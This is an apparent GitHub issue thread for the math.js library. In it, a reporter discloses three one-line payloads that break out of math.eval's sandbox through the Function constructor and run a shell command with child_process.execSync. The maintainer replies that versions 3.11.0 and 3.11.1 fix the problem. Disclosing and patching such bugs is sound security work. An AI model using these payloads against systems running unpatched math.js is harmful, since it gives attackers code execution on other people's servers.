New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

more eval exploits #821

Closed
comex opened this Issue Apr 2, 2017 · 5 comments

Comments

Projects
None yet
4 participants
@comex

comex commented Apr 2, 2017

math.eval('["//","a/*\\nreturn process.mainModule.require"]._data.map(cos.constructor)[1]()("child_process").execSync("ps >&2")');
math.eval('import({matrix:cos.constructor},{override:1});x=["process.mainModule.require(\\"child_process\\").execSync(\\"ps >&2\\")"];x()');
math.eval('a=["process.mainModule.require(\\"child_process\\").execSync(\\"ps >&2\\")"]._data;a.isRange=true;x={subset:cos.constructor}[a];x()');

Unfortunately, this is pretty much a fundamentally insecure design.

@josdejong josdejong closed this in ebb3c9b Apr 2, 2017

@josdejong josdejong added the bug label Apr 2, 2017

@josdejong

This comment has been minimized.

Owner

josdejong commented Apr 2, 2017

Thanks a lot @comex 👍
I've just released v3.11.0 with another fix.

Unfortunately, this is pretty much a fundamentally insecure design.

Can you elaborate why you think this is the case?

Here is my view on it: any evaluation of arbitrary code is a risk in general, so offering an evaluation parser immediately involves a risk. math.js has it's own expression parser though, it does not use JavaScript's dangerous eval function (except for internal optimization). It has it's own operators, functions, and variables, isolated from JavaScript. So this basically a secure sandbox, and a secure design. In JavaScript there are four ways to evaluate code: eval, new Function, setTimeout, setInterval. These are not accessible from within the expression parser. Well... should not be accessible since there popped up a security issue in that regard. The security vulnerability that @CapacitorSet and @denvit found is that you can access Function via the .constructor property of any function, like math.eval('cos.constructor('evil js code')()'). I'm very grateful that these guys found and reported this vulnerability, and also that you and others help us find related security issues. I'm no hacker nor security expert so I really need your help!

So far the security issues that I've seen all boil down to accessing Function via the .constructor property of a function. This sounds like a very clear and manageable issue, and is solved in the latest version. We need to be careful and try to find other security vulnerabilities but I don't see a reason to panic. I hope we can work together to find different security issues in case there are more.

As a side note: @comex I would prefer reporting new security issues in private rather than here in a public issue. We plug them asap but it may not always be possible to apply a fast fix for whatever reason.

@CapacitorSet

This comment has been minimized.

CapacitorSet commented Apr 2, 2017

(As a sidenote, you're looking for @denysvitali, not @denvit.)

@josdejong

This comment has been minimized.

Owner

josdejong commented Apr 2, 2017

Ah thanks for the correction @CapacitorSet. Sorry for mixing up @denvit and @denysvitali :(

Looking at the reactions my previous comment is confusing to some, in that case please don't hesitate to comment. I can definitely be overlooking something or maybe I'm not good at explaining this stuff.

@denysvitali

This comment has been minimized.

denysvitali commented Apr 2, 2017

@josdejong No problem, unfortunately someone already took my handle on Twitter and GitHub :/

@josdejong

This comment has been minimized.

Owner

josdejong commented Apr 2, 2017

Just released v3.11.1 which better pinpoints all these related vulnerabilities and catches a two new variations.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment